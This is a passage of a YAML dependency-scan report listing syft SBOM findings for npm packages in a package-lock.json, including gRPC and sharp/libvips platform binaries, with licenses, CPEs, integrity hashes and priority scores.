nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 596d6a964fdec768
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @grpc/grpc-js 1.14.3'
title: '@grpc/grpc-js 1.14.3'
description: 'Package discovered: @grpc/grpc-js 1.14.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3f87a56430ddd85e
name: '@grpc/grpc-js'
version: 1.14.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:grpc:grpc:1.14.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/%40grpc/grpc-js@1.14.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz
integrity: sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA==
dependencies:
'@grpc/proto-loader': ^0.8.0
'@js-sdsl/ordered-map': ^4.4.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: feaff3ef7cf15262
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @grpc/proto-loader 0.7.15'
title: '@grpc/proto-loader 0.7.15'
description: 'Package discovered: @grpc/proto-loader 0.7.15'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 05aac3d8e010493a
name: '@grpc/proto-loader'
version: 0.7.15
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40grpc/proto-loader@0.7.15
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.15.tgz
integrity: sha512-tMXdRCfYVixjuFK+Hk0Q1s38gV9zDiDJfWL3h1rv4Qc39oILCu1TRTDt7+fGUI8K4G1Fj125Hx/ru3azECWTyQ==
dependencies:
lodash.camelcase: ^4.3.0
long: ^5.0.0
protobufjs: ^7.2.5
yargs: ^17.7.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 81837b7c5203b82b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @grpc/proto-loader 0.8.0'
title: '@grpc/proto-loader 0.8.0'
description: 'Package discovered: @grpc/proto-loader 0.8.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1a954d92edb2b14f
name: '@grpc/proto-loader'
version: 0.8.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40grpc/proto-loader@0.8.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz
integrity: sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ==
dependencies:
lodash.camelcase: ^4.3.0
long: ^5.0.0
protobufjs: ^7.5.3
yargs: ^17.7.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ba1c7d59d68ea634
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/colour 1.1.0'
title: '@img/colour 1.1.0'
description: 'Package discovered: @img/colour 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0b879a880de07100
name: '@img/colour'
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/colour:\@img\/colour:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/colour@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/colour/-/colour-1.1.0.tgz
integrity: sha512-Td76q7j57o/tLVdgS746cYARfSyxk8iEfRxewL9h4OMzYhbW4TAcppl0mT4eyqXddh6L/jwoM75mo7ixa/pCeQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 69b8f19d695c4a0d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-darwin-arm64 0.34.5'
title: '@img/sharp-darwin-arm64 0.34.5'
description: 'Package discovered: @img/sharp-darwin-arm64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 535aeb1bbda7aba8
name: '@img/sharp-darwin-arm64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-darwin-arm64:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-darwin-arm64:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_darwin_arm64:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_darwin_arm64:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-darwin-arm64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-darwin-arm64/-/sharp-darwin-arm64-0.34.5.tgz
integrity: sha512-imtQ3WMJXbMY4fxb/Ndp6HBTNVtWCUI0WdobyheGf5+ad6xX8VIDO8u2xE4qc/fr08CKG/7dDseFtn6M6g/r3w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d46a9ddb45c9c115
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-darwin-x64 0.34.5'
title: '@img/sharp-darwin-x64 0.34.5'
description: 'Package discovered: @img/sharp-darwin-x64 0.34.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 0e26c2a4fd47f5b6
name: '@img/sharp-darwin-x64'
version: 0.34.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-darwin-x64:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-darwin-x64:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_darwin_x64:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_darwin_x64:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-darwin-x64@0.34.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-darwin-x64/-/sharp-darwin-x64-0.34.5.tgz
integrity: sha512-YNEFAF/4KQ/PeW0N+r+aVVsoIY0/qxxikF2SWdp+NRkmMB7y9LBZAVqQ4yhGCm/H3H270OSykqmQMKLBhBJDEw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f40ef319dfe0f7ca
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4'
title: '@img/sharp-libvips-darwin-arm64 1.2.4'
description: 'Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c127f66367bb283f
name: '@img/sharp-libvips-darwin-arm64'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-arm64:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-arm64:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_arm64:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_arm64:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-darwin-arm64/-/sharp-libvips-darwin-arm64-1.2.4.tgz
integrity: sha512-zqjjo7RatFfFoP0MkQ51jfuFZBnVE2pRiaydKJ1G/rHZvnsrHAOcQALIi9sA5co5xenQdTugCvtb1cuf78Vf4g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f2d59ff4b7dad330
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-darwin-x64 1.2.4'
title: '@img/sharp-libvips-darwin-x64 1.2.4'
description: 'Package discovered: @img/sharp-libvips-darwin-x64 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9896d5c1cacbd583
name: '@img/sharp-libvips-darwin-x64'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-x64:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-x64:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_x64:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_x64:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-darwin-x64/-/sharp-libvips-darwin-x64-1.2.4.tgz
integrity: sha512-1IOd5xfVhlGwX+zXv2N93k0yMONvUlANylbJw1eTah8K/Jtpi15KC+WSiaX/nBmbm2HxRM1gZ0nSdjSsrZbGKg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7b39904a53a17a82
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-linux-arm 1.2.4'
title: '@img/sharp-libvips-linux-arm 1.2.4'
description: 'Package discovered: @img/sharp-libvips-linux-arm 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 35db8dcfe65acc63
name: '@img/sharp-libvips-linux-arm'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-arm/-/sharp-libvips-linux-arm-1.2.4.tgz
integrity: sha512-bFI7xcKFELdiNCVov8e44Ia4u2byA+l3XtsAj+Q8tfCwO6BQ8iDojYdvoPMqsKDkuoOo+X6HZA0s0q11ANMQ8A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 24ce05de10ecc79e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @img/sharp-libvips-linux-arm64 1.2.4'
title: '@img/sharp-libvips-linux-arm64 1.2.4'
description: 'Package discovered: @img/sharp-libvips-linux-arm64 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: b77c206e5d189694
name: '@img/sharp-libvips-linux-arm64'
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: LGPL-3.0-or-later
spdxExpression: LGPL-3.0-or-later
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm64:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm64:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm64:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm64:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-arm64/-/sharp-libvips-linux-arm64-1.2.4.tgz
integrity: sha512-excjX8DfsIcJ10x1Kzr4RcWe1edC9PquDRRPx3YVCvQv+U5p7Yin2s32ftzikXojb1PIFc/9Mt28/y+iRklkrw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 042fdfd641843c8d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
